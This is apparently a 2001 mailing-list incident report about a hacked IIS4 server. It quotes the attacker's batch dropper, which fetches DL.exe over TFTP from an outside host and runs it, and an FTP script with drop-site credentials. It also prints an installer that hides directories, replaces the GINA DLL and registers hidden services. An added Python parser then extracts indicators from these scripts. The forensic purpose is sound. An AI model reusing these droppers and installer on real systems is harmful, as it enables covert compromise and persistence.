Moderator: Incidents, Forensics, or the bit bucket, whatever you like.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ FW: I've been hacked!! +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


On Mon, 19 Feb 2001 22:21:51 -0500, "Larry K." wrote


I am fairly new to security issues, but I am very experienced with Windows.
Today I found that someone broke into my NT 4.0 server. It is running IIS 4
for an internal web page and someone copied some files to my scripts
directory. They were able to execute a file called dl.exe that was hogging
all of my CPU cycles. I found that I had not removed anonymous access and
access from the outside. Can anyone help me find out how they got in and
make sure that they can't get back in? Any help would be appreciated.


Here is a list of the file names:


00.d
dl.bat
dl.exe
ftpcmds.txt


dl.bat contains the following:


echo off
cd \Inetpub\scripts
startDL:
tftp.exe -i web004.2coolweb.com get DL.exe
if not exist DL.exe goto startDL
start /w DL.exe
ren 00.D install.bat
attrib TFTP* -r
attrib DL.exe -r
del TFTP*
del DL.exe
install.bat %1
exit


ftpcmds.txt contains the following:


open 216.205.125.115 29292
user DL
DL
get 00.D
get 01.D
get 02.D
get 03.D
get 04.D
get 05.D
get 06.D
get 07.D
get 08.D
get 09.D
get 10.D
get 11.D
get 12.D
get 13.D
bye
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ END FW: I've been hacked!! +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


While this doesn't shed much light on how Larry K. was hacked, it illustrates
the results of leaving IIS un-hardened.


I ambled over to
tftp://63.84.169.1:69 (web004.2coolweb.com)
for DL.EXE, and then to
ftp://DL@216.205.125.115:29292 (115-216.205.125.dellhost.com)
for the BackGate kit that was downloaded to Larry's IIS4 box.


Below is what I found. It creates a Warez repository and FTP proxy.
There was no response to attempts at contacting the host owners or the upstream
providers of the (T)FTP site(s) distributing the malware.


Matt 2001-02-20


Text strings courtesy of BinText by Robin Keir
http://www.foundstone.com
UPX is The Ultimate Packer for eXecutables
http://upx.tsx.org


=====================
Contents of DL.EXE
tftp from 63.84.169.1
=====================
UPX 1.02 contents Un-packed


00001C10 00401C10 0 wininet.dll
00001C20 00401C20 0 FtpGetFileA
00001C64 00401C64 0 FtpPutFileA
00001CA8 00401CA8 0 FtpSetCurrentDirectoryA
00001D08 00401D08 0 InternetOpenA
00001D50 00401D50 0 InternetConnectA
00001F70 00401F70 0 FtpOpenFileA
00001FB8 00401FB8 0 FtpDeleteFileA
000016DF 004016DF 0 *AZ:FTPInstFileDLProject1.vbp
000019D4 004019D4 0 vb wininet
00001CC4 00401CC4 0 /05.D
00002144 00402144 0 216.205.125.115
00002174 00402174 0 /00.D
00002194 00402194 0 /01.D
000021B4 004021B4 0 /02.D
000021D4 004021D4 0 /03.D
000021F4 004021F4 0 /04.D
00002224 00402224 0 /06.D
00002244 00402244 0 /07.D
00002264 00402264 0 /08.D
00002284 00402284 0 /09.D
000022A4 004022A4 0 /10.D
000022C4 004022C4 0 /11.D
000022E4 004022E4 0 /12.D
00002304 00402304 0 /13.D
=====EoF=====


================
Contents of 00.D
================
echo off
echo Renaming Files
ren 01.D dir.txt
ren 02.D FireDaemon.exe
ren 03.D login.txt
ren 04.D MMtask.exe
ren 05.D NewGina.dll
ren 06.D reggina.exe
ren 07.D regit.exe
ren 08.D restrict.exe
ren 09.D restsec.exe
ren 10.D settings.reg
ren 11.D SUD.exe
ren 12.D makeini.exe
ren 13.D SUD.ini
echo Making ini
.\makeini.exe %1
echo Making Dirs
md %windir%\system32\os2\dll\new
attrib %windir%\system32\os2\dll\new +s +h
.\restrict.exe %windir%\system32\os2\dll\new
md %1:\adminback0810\root
attrib %1:\adminback0810\root +s +h
.\restrict.exe %1:\adminback0810\root
md %1:\adminback0810\root\system
attrib %1:\adminback0810\root\system +s +h
.\restrict.exe %1:\adminback0810\root\system
md %1:\adminback0810\root\system\dll
attrib %1:\adminback0810\root\system\dll +s +h
.\restrict.exe %1:\adminback0810\root\system\dll
echo Copying Files
copy .\FireDaemon.exe %windir%\system32\os2\dll\new > nul:
copy .\SUD.exe %windir%\system32\os2\dll\new > nul:
copy .\SUD.bak %windir%\system32\os2\dll\new > nul:
copy .\login.txt %windir%\system32\os2\dll\new > nul:
copy .\dir.txt %windir%\system32\os2\dll\new > nul:
copy .\MMtask.exe %windir%\system32\os2\dll\new > nul:
copy .\newgina.dll %windir%\system32 > nul:
attrib %windir%\system32\newgina.dll +s +h
echo Setting up Registry
.\regit.exe .\settings.reg
echo Installing Services
set MXBIN=%windir%\system32\os2\dll\new
set MXHOME=%windir%\system32\os2\dll\new
%windir%\system32\os2\dll\new\Firedaemon.exe -i OS2SRV "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\SUD.exe" "" Y 0 0 N Y
%windir%\system32\os2\dll\new\Firedaemon.exe -i MMTASK "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\MMtask.exe" "" Y 0 0 N Y
.\reggina.exe
echo Waiting 5 sec.
.\restsec.exe 5
echo Starting Services
net start os2srv
net start mmtask
echo Services Installed and Started
echo Deleting Install-Files
del FireDaemon.exe
del makeini.exe
del SUD.exe
del SUD.ini
del SUD.bak
del login.txt
del dir.txt
del MMtask.exe
del newgina.dll
del restrict.exe
del regit.exe
del settings.reg
del reggina.exe
del restsec.exe
attrib E.asp -r
del E.asp
del dl.bat
del install.bat
=====EOF=====
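As an added example that is not part of Matt's post or of the kit itself: a small Python parser that takes the recovered ftpcmds.txt, dl.bat and 00.D text and turns them into the indicator list a responder would search for on other boxes, namely the TFTP and FTP drop sites and port, the FTP credentials, the staged file names and what they are renamed to, and the service names the installer registers through FireDaemon. The three strings are constructed excerpts of the scripts quoted above (path separators are assumed, since the forwarded copy lost them); the function names and regexes are mine, not the kit's.

```python
import re

# Constructed sample input: excerpts of ftpcmds.txt, dl.bat and 00.D as quoted
# in the post above; path separators are assumed (the forwarded copy lost them).
FTPCMDS_TXT = """\
open 216.205.125.115 29292
user DL
DL
get 00.D
get 01.D
get 02.D
get 03.D
get 04.D
get 05.D
get 06.D
get 07.D
get 08.D
get 09.D
get 10.D
get 11.D
get 12.D
get 13.D
bye
"""
DL_BAT = """\
tftp.exe -i web004.2coolweb.com get DL.exe
ren 00.D install.bat
install.bat %1
"""
INSTALL_BAT = """\
ren 01.D dir.txt
ren 02.D FireDaemon.exe
ren 03.D login.txt
ren 04.D MMtask.exe
ren 05.D NewGina.dll
ren 06.D reggina.exe
ren 07.D regit.exe
ren 08.D restrict.exe
ren 09.D restsec.exe
ren 10.D settings.reg
ren 11.D SUD.exe
ren 12.D makeini.exe
ren 13.D SUD.ini
set MXBIN=%windir%\\system32\\os2\\dll\\new
%MXBIN%\\Firedaemon.exe -i OS2SRV "%MXBIN%" "%MXBIN%\\SUD.exe" "" Y 0 0 N Y
%MXBIN%\\Firedaemon.exe -i MMTASK "%MXBIN%" "%MXBIN%\\MMtask.exe" "" Y 0 0 N Y
net start os2srv
net start mmtask
"""

TFTP_RE = re.compile(r"\btftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
REN_RE = re.compile(r"^\s*ren(?:ame)?\s+(\S+)\s+(\S+)", re.I | re.M)
FIREDAEMON_RE = re.compile(r"firedaemon(?:\.exe)?\s+-i\s+(\S+)", re.I)
NET_START_RE = re.compile(r"^\s*net\s+start\s+(\S+)", re.I | re.M)


def parse_ftp_script(text):
    """Parse an ftp.exe command script: server, port, credentials, fetched files."""
    info = {"host": None, "port": 21, "user": None, "password": None, "files": []}
    lines = [ln.split() for ln in text.splitlines() if ln.strip()]
    for n, parts in enumerate(lines):
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) > 1:
            info["host"] = parts[1]
            info["port"] = int(parts[2]) if len(parts) > 2 else 21
        elif cmd == "user" and len(parts) > 1:
            info["user"] = parts[1]
            # ftp.exe prompts for the password; a script answers on the next line
            nxt = lines[n + 1][0] if n + 1 < len(lines) else None
            info["password"] = parts[2] if len(parts) > 2 else nxt
        elif cmd in ("get", "mget") and len(parts) > 1:
            info["files"].append(parts[1])
    return info


def parse_tftp_fetches(text):
    """(host, remote_file) for every 'tftp [-i] host get file' line in a batch file."""
    return [(m.group(1), m.group(2)) for m in TFTP_RE.finditer(text)]


def parse_renames(text):
    """Map staged name -> final name from every 'ren' line."""
    return dict(REN_RE.findall(text))


def parse_services(text):
    """Service names registered with 'FireDaemon -i' or started with 'net start'."""
    names = {n.upper() for n in FIREDAEMON_RE.findall(text)}
    names |= {n.upper() for n in NET_START_RE.findall(text)}
    return sorted(names)


def build_indicators(ftp_script, dropper, installer):
    """One indicator list covering drop sites, credentials, file and service names."""
    ftp = parse_ftp_script(ftp_script)
    renames = parse_renames(dropper)
    renames.update(parse_renames(installer))
    return {
        "ftp_server": (ftp["host"], ftp["port"]),
        "ftp_credentials": (ftp["user"], ftp["password"]),
        "tftp_sources": parse_tftp_fetches(dropper),
        "staged_files": ftp["files"],
        "final_names": sorted(renames.values(), key=str.lower),
        "services": parse_services(installer),
    }
```

Calling `build_indicators(FTPCMDS_TXT, DL_BAT, INSTALL_BAT)` yields the two drop hosts with the non-standard FTP port 29292, the DL/DL login, the fourteen staged `NN.D` names, the final names to look for (including newgina.dll under system32) and the OS2SRV and MMTASK service names; the same functions run unchanged over the real files pulled from an affected box, and the rename map is what lets a responder match the staged names in IIS or FTP logs to the files actually left on disk.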


================
Contents of 01.D
DIR.TXT
================


---
%ServerKBps KBps Current bandwith used
%Dfree MB free
---
=====EoF=====
================
Contents of 02.D
FIREDAEMON.EXE
================
UPX 1.02 contents Un-packed
File pos Mem pos ID Text
======== ======= == ====
0000E2AC 0040E2AC 0 v0.09c
0000E2B4 0040E2B4 0